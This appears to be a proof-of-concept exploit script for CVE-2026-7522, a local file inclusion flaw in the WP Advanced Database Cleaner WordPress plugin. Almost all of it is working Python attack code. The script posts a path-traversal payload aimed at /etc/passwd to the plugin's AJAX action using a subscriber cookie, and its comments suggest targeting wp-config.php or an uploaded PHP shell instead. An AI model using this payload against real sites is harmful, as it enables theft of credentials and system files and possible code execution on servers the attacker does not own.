CVE-2026-7522 WP Advanced Database Cleaner LFI漏洞

# PoC for CVE-2026-7522 # This script demonstrates the exploitation of the LFI vulnerability. # Attacker needs valid subscriber credentials. import requests target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker's cookies (Subscriber level) cookies = { "wordpress_logged_in_xxx": "valid_session_cookie_here" } # The vulnerable parameter 'template' # Pointing to a sensitive file (e.g., wp-config.php or an uploaded shell) payload_data = { "action": "adc_ajax_action", "template": "../../../../../../../../etc/passwd" # Or path to a malicious PHP file: "../../wp-content/uploads/shell.php" } try: response = requests.post(target_url, data=payload_data, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text[:500]) # Print first 500 chars else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")